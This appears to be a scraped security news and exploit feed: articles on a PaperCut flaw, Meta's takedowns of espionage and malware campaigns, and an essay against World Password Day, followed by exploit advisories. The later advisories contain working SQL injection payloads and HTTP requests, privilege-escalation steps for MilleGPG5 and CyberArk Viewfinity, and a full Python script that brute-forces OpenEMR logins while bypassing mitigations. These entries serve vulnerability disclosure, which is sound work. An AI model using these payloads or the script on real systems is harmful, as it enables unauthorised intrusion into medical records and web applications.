Cybersecurity researchers have found a way to exploit a recently disclosed critical flaw in PaperCut servers in a manner that bypasses all current detections.
Tracked as CVE-2023-27350 (CVSS score: 9.8), the issue affects PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.
While the flaw was patched by the

Server Security / Vulnerability

Cybersecurity researchers have found a way to exploit a recently disclosed critical flaw in PaperCut servers in a manner that bypasses all current detections.

Tracked as CVE-2023-27350 (CVSS score: 9.8), the issue affects PaperCut MF and NG installations that could be exploited by an unauthenticated attacker to execute arbitrary code with SYSTEM privileges.

While the flaw was patched by the Australian company on March 8, 2023, the first signs of active exploitation emerged on April 13, 2023.

Since then, the vulnerability has been weaponized by multiple threat groups, including ransomware actors, with post-exploitation activity resulting in the execution of PowerShell commands designed to drop additional payloads.

Now, VulnCheck has published a proof-of-concept (PoC) exploit that sidesteps existing detection signatures by leveraging the fact that "PaperCut NG and MF offer multiple paths to code execution."

It's worth noting that public exploits for the flaw use the PaperCut printer scripting interface to either execute Windows commands or drop a malicious Java archive (JAR) file.

Both these approaches, per VulnCheck, leave distinct footprints in the Windows System Monitor (aka Sysmon) service and the server's log file, not to mention trigger network signatures that can detect the authentication bypass.

But the Massachusetts-based threat Intelligence firm said it discovered a new method that abuses the print management software's "User/Group Sync" feature, which makes it possible to synchronize user and group information from Active Directory, LDAP, or a custom source.

When opting for a custom directory source, users can also specify a custom authentication program to validate a user's username and password. Interestingly, the user and auth programs can be any executable, although the auth program has to be interactive in nature.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The PoC exploit devised by VulnCheck banks on the auth program set as "/usr/sbin/python3" for Linux and "C:\\Windows\\System32\\ftp.exe" for Windows. All an attacker then needs to execute arbitrary code is to provide a malicious username and password during a login attempt, the company said.

The attack method could be exploited to launch a Python reverse shell on Linux or download a custom reverse shell hosted on a remote server in Windows without activating any of the known detections.

"An administrative user attacking PaperCut NG and MF can follow multiple paths to arbitrary code execution," VulnCheck pointed out.

"Detections that focus on one particular code execution method, or that focus on a small subset of techniques used by one threat actor are doomed to be useless in the next round of attacks. Attackers learn from defenders' public detections, so it's the defenders' responsibility to produce robust detections that aren't easily bypassed."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover New Exploit for PaperCut Vulnerability That Can Bypass Detection

Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.
"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information

Three different threat actors leveraged hundreds of elaborate fictitious personas on Facebook and Instagram to target individuals located in South Asia as part of disparate attacks.

"Each of these APTs relied heavily on social engineering to trick people into clicking on malicious links, downloading malware or sharing personal information across the internet," Guy Rosen, chief information security officer at Meta, said. "This investment in social engineering meant that these threat actors did not have to invest as much on the malware side."

The fake accounts, in addition to using traditional lures like women looking for a romantic connection, masqueraded as recruiters, journalists, or military personnel.

At least two of the cyber espionage efforts entailed the use of low-sophistication malware with reduced capabilities, likely in an attempt to get past app verification checks established by Apple and Google.

One of the groups that came under Meta's radar is a Pakistan-based advanced persistent threat (APT) group that relied on a network of fake accounts, apps, and websites to infect military personnel in India and among the Pakistan Air Force with GravityRAT under the guise of cloud storage and entertainment apps.

The company also expunged 110 accounts on Facebook and Instagram linked to an APT identified as Bahamut that targeted people in India and Pakistan with Android malware that was published in the Google Play Store. The apps, which posed as secure chat or VPN apps, have since been removed.

Lastly, it purged 50 accounts on Facebook and Instagram tied to an India-based threat actor dubbed Patchwork, which took advantage of malicious apps uploaded to the Play Store to harvest data from victims in Pakistan, India, Bangladesh, Sri Lanka, Tibet, and China.

Also disrupted by meta are six adversarial networks from the U.S., Venezuela, Iran, China, Georgia, Burkina Faso, and Togo that engaged in what it called "coordinated inauthentic behavior" on Facebook and other social media platforms like Twitter, Telegram, YouTube, Medium, TikTok, Blogspot, Reddit, and WordPress.

All these geographically dispersed networks are said to have set up fraudulent news media brands, hacktivist groups, and NGOs to build credibility, with three of them linked to a U.S.-based marketing firm named Predictvia, a political marketing consultancy in Togo known as the Groupe Panafricain pour le Commerce et l'Investissement (GPCI), and Georgia's Strategic Communications Department.

Two networks that originated from China operated dozens of fraudulent accounts, pages, and groups across Facebook and Instagram to target users in India, Tibet, Taiwan, Japan, and the Uyghur community.

In both instances, Meta said it took down the activities before they could "build an audience" on its services, adding it found associations connecting one network to individuals associated with a Chinese IT firm referred to as Xi'an Tianwendian Network Technology.

The network from Iran, per the social media giant, primarily singled out Israel, Bahrain, and France, corroborating an earlier assessment from Microsoft about Iran's involvement in the hacking of the French satirical magazine Charlie Hebdo in January 2023.

"The people behind this network used fake accounts to post, like and share their own content to make it appear more popular than it was, as well as to manage Pages and Groups posing as hacktivist teams," Meta said. "They also liked and shared other people's posts about cyber security topics, likely to make fake accounts look more credible."

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

The disclosure also coincides with a new report from Microsoft, which revealed that Iranian state-aligned actors are increasingly relying on cyber-enabled influence operations to "boost, exaggerate, or compensate for shortcoming in their network access or cyberattack capabilities" since June 2022.

The Iranian government has been linked by Redmond to 24 such operations in 2022, up from seven in 2021, including clusters tracked as Moses Staff, Homeland Justice, Abraham's Ax, Holy Souls, and DarkBit. Seventeen of the operations have taken place since June 2022.

The Windows maker further said it observed "multiple Iranian actors attempting to use bulk SMS messaging in three cases in the second half of 2022, likely to enhance the amplification and psychological effects of their cyber-influence operations."

The shift in tactics is also characterized by the rapid exploitation of known security flaws, use of victim websites for command-and-control, and adoption of bespoke implants to avoid detection and steal information from victims.

The operations, which have singled out Israel and the U.S. as a retaliation for allegedly fomenting unrest in the nation, have sought to bolster Palestinian resistance, instigate unrest in Bahrain, and counter the normalization of Arab-Israeli relations.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Uncovers Massive Social Media Cyber Espionage Operations Across South Asia

Categories: News
Critical technology should not require an annual pep talk to function correctly.



(Read more...)




The post World Password Day must die appeared first on Malwarebytes Labs.

The continued existence of World Password Day is a tell that something has gone badly wrong in cybersecurity.

Now in its tenth year, the day is supposed to act as an annual reminder for people to follow good password hygiene: Don’t reuse passwords; use long passwords; no, longer passwords than that; use a collection of random words; no, not those words; use a phrase; use a collection of phrases; don’t forget the weird characters; etc., etc.

This is bad. Critical technology should not require an annual pep talk to function correctly. There is no annual “how to avoid nuclear meltdown” day.

And make no mistake, password authentication is critical technology. It is the bedrock on which security is built. Fail at authentication and it doesn’t matter how “military-grade” your encryption is or if you patch twice a day before flossing, you’re toast.

The existence of World Password Day is a symptom of two problems.

The first is that password authentication is a terrible design. Its success hinges on humans being good at something humans are really bad at: Creating and remembering long strings of random characters.

In an environment where users must now remember about 100 passwords each, it is impossible to use passwords well without assistance. The only chance you have of making it work is to outsource the “creating and remembering” part you’re really bad at to a computer, in the form of some password management software.

Password managers are great—apart from where they aren't, like when you're logging in to Windows—but from what we can tell, most people still don’t use password managers, and those that do are almost certainly the most security-aware among us; in other words, the folks who need its help the least.

And when I write “impossible” I am not being hyperbolic. You cannot remember 100, different, strong passwords. You just can’t. Almost all of us run into serious problems juggling fewer than ten. (If you’re still doubtful, read Why (almost) everything we told you about passwords was wrong, it’s got more details and links to the research.)

The second problem is that for too long we made passwords a problem for users to solve instead a problem for IT or security. Dispersing the responsibility like this created an enormous headache that has consumed untold resources. A system is only as strong as its worst password choice, but we almost never know what the worst choice is or who made it. That creates a situation where improving security rests on our ability to _improve every single user_ in the hope that we’ll reach the worst.

Attempts to level up users often boil down to edicts about how to do passwords better, such as making sure each password includes a mixture of uppercase and lowercase letters, and that passwords are not reused.

It’s like we asked the janitor to configure the firewall rules and then tried to fix our terrible mistake by having a firewall expert constantly lecture the janitor about not messing up the firewall.

Repeated password breaches over decades—which show us real users’ password choices—suggest that these edicts are having little effect. This shouldn’t be a surprise. Reusing passwords and making passwords simpler may be bad for security, but they make perfect sense if your most pressing problem is working out how to juggle an unmanageably large portfolios of passwords.

Our experiment in shifting responsibility and blame to users hasn’t worked. Ransomware gangs rely routinely on phished, stolen, or guessed passwords to break into corporate networks through VPNs or remote desktops, causing untold damage and disruption.

The good news is that while there isn’t much we can do about problem number one, number two was a choice, and it’s a choice we can un-make. There is another way, but it requires a shift in mindset.

Instead of thinking about how to get users to choose stronger passwords, businesses should focus on protecting themselves from users’ poor password choices instead.

The most powerful way to do this is to remove passwords entirely. Thankfully, after decades of false starts, a slew of technologies like Apple’s Touch ID, Windows Hello, and FIDO2 has appeared that now make this a viable option in a number of areas.

Passwords are going to be with us for a long time yet though, so we still need ways to cope with bad ones where passwordless authentication is unavailable.

Where you can’t abandon passwords, the next best option is multi-factor authentication (MFA). In 2019, Microsoft’s Alex Weinert wrote that “Based on our studies, your account is more than 99.9% less likely to be compromised if you use MFA.”

MFA comes in different flavors and your choice of flavor makes a difference: Hardware keys are better than push notifications from an app, which are better than One-Time Password (OTP) codes from an app, which are better than OTP codes over SMS. But the improvements that come in the steps between the different forms of MFA are incremental. The step between MFA of any kind and no MFA at all is transformational.

More than any other choice or technology, MFA puts the responsibility for password security back into the hands of IT and security specialists where it belongs.

There are other measures, too. When you go to an ATM you don’t have to type in a 14-character password with eight quattuordecillion (that's a number with 45 zeroes at the end of it) possible combinations to get your money—a 4-digit PIN with a paltry 10,000 possible combinations will do.

Why? Because the ATM isn’t going to give an attacker 10,000 chances to guess the correct PIN, it’s going to give them three, and then it’s going to eat the card. The same thing happens on your iPhone. Six wrong guesses and you’re on the naughty step. Ten wrong guesses and your data can self-destruct.

No normal user is going to make hundreds of guesses at their password before phoning support, so take a leaf out of your bank’s playbook and give your users a handful of chances to enter their password correctly.

Like MFA, account lockouts allow users to stay secure even with truly awful password choices. (After all, EVERY 4-digit PIN is a terrible password choice.)

In the interests of defense in depth, businesses may still want to ensure that users are making strong passwords, or at least avoiding weak ones. Here, the thinking has changed in the last decade, and that change is enshrined in the National Institute of Standards and Technology (NIST) Digital Identity Guidelines.

Forcing people to create passwords to a formula, insisting on at least one uppercase letter, at least one special character etc, is out. And so are periodic password resets. Both are far more effective at annoying users than they are at improving security.

Instead, NIST says, it’s more effective to simply stop users choosing known bad passwords, such as passwords that have appeared in breaches or that are based on dictionary words.

If you are going to insist on strong passwords, please make a password manager part of the standard software suite on all your organization’s machines, and make sure employees actually know how to use it. Many users simply don't trust password managers, and unless you've sat with somebody using one for the first time, you may not appreciate how difficult it can be for people to make sense of them.

The measures I’ve suggested in this article are not interchangeable or equally effective: You should start at the top and work down. If you do that, you can improve password security, remove the need for toothless edicts, and perhaps we can finally get rid of these annual pep talks.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

World Password Day must die

Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.
The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run

Meta said it took steps to take down more than 1,000 malicious URLs from being shared across its services that were found to leverage OpenAI's ChatGPT as a lure to propagate about 10 malware families since March 2023.

The development comes against the backdrop of fake ChatGPT web browser extensions being increasingly used to steal users' Facebook account credentials with an aim to run unauthorized ads from hijacked business accounts.

"Threat actors create malicious browser extensions available in official web stores that claim to offer ChatGPT-based tools," Meta said. "They would then promote these malicious extensions on social media and through sponsored search results to trick people into downloading malware."

The social media giant said it has blocked several iterations of a multi-pronged malware campaign dubbed Ducktail over the years, adding it issued a cease and desist letter to individuals behind the operation who are located in Vietnam.

Trend Micro, in a series of tweets last week, detailed an information stealer that's disguised as a Windows desktop client for ChatGPT to extract passwords, session cookies, and history from Chromium-powered browsers. The company said the malware shares similarities with Ducktail.

Besides ChatGPT, threat actors have also been observed shifting to other "hot-button issues and popular topics" like Google Bard, TikTok marketing tools, pirated software and movies, and Windows utilities to dupe people into clicking on bogus links.

"These changes are likely an attempt by threat actors to ensure that any one service has only limited visibility into the entire operation," Guy Rosen, chief information security officer at Meta, said.

The attack chains are primarily engineered to target the personal accounts of users who manage or are connected to business pages and advertising accounts on Facebook.

Besides using social media for propagating the ChatGPT-themed malicious URLs, the malware is hosted on a variety of legitimate services such as Buy Me a Coffee, Discord, Dropbox, Google Drive, iCloud, MediaFire, Mega, Microsoft OneDrive, and Trello.

Ducktail isn't the only stealer malware detected in the wild, for Meta disclosed that it uncovered another novel strain dubbed NodeStealer that's capable of plundering cookies and passwords from web browsers to ultimately compromise Facebook, Gmail, and Outlook accounts.

The malware is assessed to be of Vietnamese origin, with Meta noting that it "took action to disrupt it and help people who may have been targeted to recover their accounts" within two weeks of it being deployed in late January 2023.

UPCOMING WEBINAR

Learn to Stop Ransomware with Real-Time Protection

Join our webinar and learn how to stop ransomware attacks in their tracks with real-time MFA and service account protection.

Save My Seat!

Samples analyzed by the company show that NodeStealer binary is distributed via Windows executables disguised as PDF and XLSX files with filenames relating to marketing and monthly budgets. The files, when opened, deliver JavaScript code that's designed to exfiltrate sensitive data from Chromium-based browsers.

NodeStealer gets its name from the use of the Node.js cross-platform JavaScript runtime environment, which is bundled along with the main payload, to set up persistence and execute the malware. No new artifacts have been identified as of February 27, 2023.

"After retrieving the Facebook credentials from the target's browser data, the malware uses it to make several unauthorized requests to Facebook URLs to enumerate account information related to advertising," Meta said. "The stolen information then enables the threat actor to assess and then use users' advertising accounts to run unauthorized ads."

In an attempt to slip under the radar of the company's anti-abuse systems, the rogue requests are made from the targeted user's device to the Facebook APIs, lending a veneer of legitimacy to the activity.

To counter such threats, Meta said it's launching a new support tool that guides users to identify and remove malware, enable businesses to verify connected Business Manager accounts, and require additional authentication when accessing a credit line or changing business administrators.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Takes Down Malware Campaign That Used ChatGPT as a Lure to Steal Accounts

Judging Management System v1.0 by oretnom23 was discovered to vulnerable to SQL injection via /php-jms/review_result.php?mainevent_id=, mainevent_id.

**Judging Management System v1.0 by oretnom23 has SQL injection**

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/review\_result.php?mainevent\_id=

Vulnerability location: /php-jms/review\_result.php?mainevent\_id=, mainevent\_id

dbname =jms\_db

\[+\] Payload: /php-jms/review\_result.php?mainevent\_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+// Leak place ---> mainevent\_id

​sql GET /php-jms/review_result.php?mainevent_id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ HTTP/1.1 Host: 192.168.1.88 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1 Connection: close ​

CVE-2023-30077: cve_report/SQLi-1.md at main · Dzero57/cve_report

An issue was discovered in Genomedics MilleGP5 5.9.2, allows remote attackers to execute arbitrary code and gain escalated privileges via modifying specific files.

    # Exploit Title: MilleGPG5 5.9.2 (Gennaio 2023) - Local Privilege Escalation / Incorrect Access Control# Date: 2023-04-28# Exploit Author: Andrea Intilangelo# Vendor Homepage: https://millegpg.it/# Software Homepage: https://millegpg.it - https://millewin.it/prodotti/governo-clinico-3/# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe# Version: 5.9.2# Tested on: Microsoft Windows 10 Enterprise x64 22H2, build 19045.2913# CVE: CVE-2023-25438MilleGPG / MilleGPG5 also known as "Governo Clinico 3"Vendor: Millennium S.r.l. / Dedalus Group - Dedalus Italia S.p.a. / Genomedics S.r.l.Affected/tested version: MilleGPG5 5.9.2Summary:Mille General Practice Governance (MilleGPG): an interactive tool to address an effective quality of care through theItalian general practice network.MilleGPG is an innovative IT support for the evaluation and optimization of patient care and intervention processes,complete with new features for the management of the COVID-19 vaccine campaign. It is An irreplaceable "ally" for theGeneral Practitioner, also offering contextual access to the most authoritative scientific content and CME training.Vuln desc:The application is prone to insecure file/folder permissions on its default installation path, wrongly allowing somefiles to be modified by unprivileged users, malicious process and/or threat actor. Attacker can exploit the weaknessabusing the "write" permission of the main application available to all users on the system or network.Details:Any low privileged user can elevate their privileges abusing files/folders that have incorrect permissions, e.g.:C:\Program Files\MilleGPG5\MilleGPG5.exe    (main gui application)C:\Program Files\MilleGPG5\plugin\          (GPGCommand.exe, nginx and php files)C:\Program Files\MilleGPG5\k-platform\      (api and webapp files)such as BUILTIN\Users:(I)(OI)(CI)(R,W) and/or FILE_GENERIC_WRITE, FILE_WRITE_DATA and FILE_WRITE_EA

CVE-2023-25438: MilleGPG5 5.9.2 Local Privilege Escalation ≈ Packet Storm

Judging Management System v1.0 was discovered to contain a SQL injection vulnerability via the judge_id parameter at /php-jms/edit_judge.php.

Permalink

Cannot retrieve contributors at this time

**Judging Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: whoamikey

vendors: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=

Vulnerability location: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=, judge\_id

dbname =jms\_db

\[+\] Payload: /php-jms/edit\_judge.php?sub\_event\_id=&se\_name=&judge\_id=-1%27%20union%20select%201,2,database(),4,5,6--+ // Leak place ---> judge\_id

GET /php\-jms/edit\_judge.php?sub\_event\_id\=&se\_name\=&judge\_id\=\-1%27%20union%20select%201,2,database(),4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=f6bhcgo222sk31fnm99nf9tjt1
Connection: closes

CVE-2023-30204: bug_report/SQLi-3.md at main · debug601/bug_report

In CyberArk Viewfinity 5.5.10.95 and 6.x before 6.1.1.220, a low privilege user can escalate to an administrative user via a bug within the "add printer" option.

    # Exploit Title: Privilege Escalation via CyberArk Viewfinity <= 5.5 (5.5.10.95)
    # Date: Found June 2017
    # Vendor Homepage: https://www.cyberark.com/ 
    # Version: Viewfinity version 5.5 (5.5.10.95)
    # Exploit Author: Eric Guillen aka geoda
    # Contact: https://twitter.com/ericsguillen
    # Website: https://geodasecurity.blogspot.com/
    # Tested on: Windows 7 and Windows 10
    # CVE: CVE-2017-11197
    # Category: Privilege Escalation
    
    1. Description
    
    Viewfinity allows the business to "effectively minimize local administrator privileges and control applications on endpoints and servers"
    
    This vulnerability allows a low privilege user to escalate to an administrative user via a bug within the Viewfinity "add printer" option.
    
    2. Proof of Concept
    
    First, verify you are a low privilege user by running the command "net session" in a CMD prompt. Net session displays information about all sessions with the local computer. The user will get Access is denied if they do not have Administrative privileges. 
    
    1. On the system tray, right click on Viewfinity and "Open Viewfinity Control Panel..."
    2. Click "Add Printer"
    3. Click "Add a network, wireless or Bluetooth printer"
    4. Click "The printer that I want isn't listed"
    5. Click "Select a shared printer by name"
    6. Click the "Browse..." icon
    7. Directly in the browser window, search for "C:\windows\system32\cmd.exe" and press <Enter>
    8. This will spawn a new CMD prompt. Verify you are now Administrator by typing in "net session"
    
    3. Solution
    
    Vendor has been notified of this vulnerability and has been addressed in the agent v6.1.1.220. Although untested, this vulnerability could be present prior to v6.1.1.220

CVE-2017-11197: Offensive Security’s Exploit Database Archive

OpenEMR versions 7.0.1 and below remote authentication bruteforcing tool that bypasses mitigations.

    # Exploit Title: OpenEMR v7.0.1 - Authentication credentials brute force# Date: 2023-04-28# Exploit Author: abhhi (Abhishek Birdawade)# Vendor Homepage: https://www.open-emr.org/# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v7_0_1.tar.gz# Version: 7.0.1# Tested on: Windows'''Example Usage:- python3 exploitBF.py -l "http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default" -u username -p pass.txt '''import requestsimport sysimport argparse, textwrapfrom pwn import *#Expected Argumentsparser = argparse.ArgumentParser(description="OpenEMR <= 7.0.1 Authentication Bruteforce Mitigation Bypass", formatter_class=argparse.RawTextHelpFormatter, epilog=textwrap.dedent(''' Exploit Usage : python3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -u username -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul user.txt -p pass.txtpython3 exploitBF.py -l http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default -ul /Directory/user.txt -p /Directory/pass.txt'''))                     parser.add_argument("-l","--url", help="Path to OpenEMR (Example: http://127.0.0.1/interface/main/main_screen.php?auth=login&site=default)") parser.add_argument("-u","--username", help="Username to Bruteforce for.")parser.add_argument("-ul","--userlist", help="Username Dictionary")  parser.add_argument("-p","--passlist", help="Password Dictionary")    args = parser.parse_args()if len(sys.argv) < 2:    print (f"Exploit Usage: python3 exploitBF.py -h")              sys.exit(1)  # VariableLoginPage = args.urlUsername = args.usernameUsername_list = args.userlistPassword_list = args.passlistlog.info('OpenEMR Authentication Brute Force Mitigation Bypass Script by abhhi \n ')def login(Username,Password):    session = requests.session()              r = session.get(LoginPage) # Progress Check        process = log.progress('Brute Force')#Specifying Headers Value    headerscontent = {    'User-Agent' : 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0',    'Referer' : f"{LoginPage}",    'Origin' : f"{LoginPage}",    }#POST REQ data    postreqcontent = {    'new_login_session_management' : 1,    'languageChoice' : 1,    'authUser' : f"{Username}",    'clearPass' : f"{Password}"    }#Sending POST REQ    r = session.post(LoginPage, data = postreqcontent, headers = headerscontent, allow_redirects= False)#Printing Username:Password                process.status('Testing -> {U}:{P}'.format(U = Username, P = Password))            #Conditional loops        if 'Location' in r.headers:        if "/interface/main/tabs/main.php" in r.headers['Location']:            print()            log.info(f'SUCCESS !!')            log.success(f"Use Credential -> {Username}:{Password}")            sys.exit(0)        #Reading User.txt & Pass.txt filesif Username_list:    userfile = open(Username_list).readlines()    for Username in userfile:        Username = Username.strip() passfile = open(Password_list).readlines()for Password in passfile:    Password = Password.strip()       login(Username,Password)

OpenEMR 7.0.1 Authentication Bruteforce Mitigation Bypass

PHPJabbers Simple CMS version 5.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: PHPJabbers Simple CMS 5.0 - SQL Injection# Date: 2023-04-29# Exploit Author: Ahmet Ümit BAYRAM# Vendor Homepage: https://www.phpjabbers.com/faq.php# Software Link: https://www.phpjabbers.com/simple-cms/# Version: 5.0# Tested on: Kali Linux### Request ###GET/simplecms/index.php?action=pjActionGetFile&column=created&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10HTTP/1.1Accept: */*x-requested-with: XMLHttpRequestReferer: https://localhost/simplecms/preview.php?lid=1Cookie: simpleCMS=lhfh97t17ahm8m375r3upfa844;_fbp=fb.1.1682777372679.72057406; pjd=2rnbhrurbqjsuajj7pnffh2292;pjd_simplecms=1; last_position=%2FAccept-Encoding: gzip,deflate,brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36Host: localhostConnection: Keep-alive### Parameter & Payloads ###Parameter: column (GET)    Type: boolean-based blind    Title: Boolean-based blind - Parameter replace (original value)    Payload: action=pjActionGetFile&column=(SELECT (CASE WHEN (9869=9869)THEN 2 ELSE (SELECT 2339 UNION SELECT 4063)END))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (EXTRACTVALUE)    Payload: action=pjActionGetFile&column=2 ANDEXTRACTVALUE(2212,CONCAT(0x5c,0x716b766271,(SELECT(ELT(2212=2212,1))),0x716b707671))&controller=pjAdminFiles&direction=DESC&page=0&rowCount=10

Tag

#windows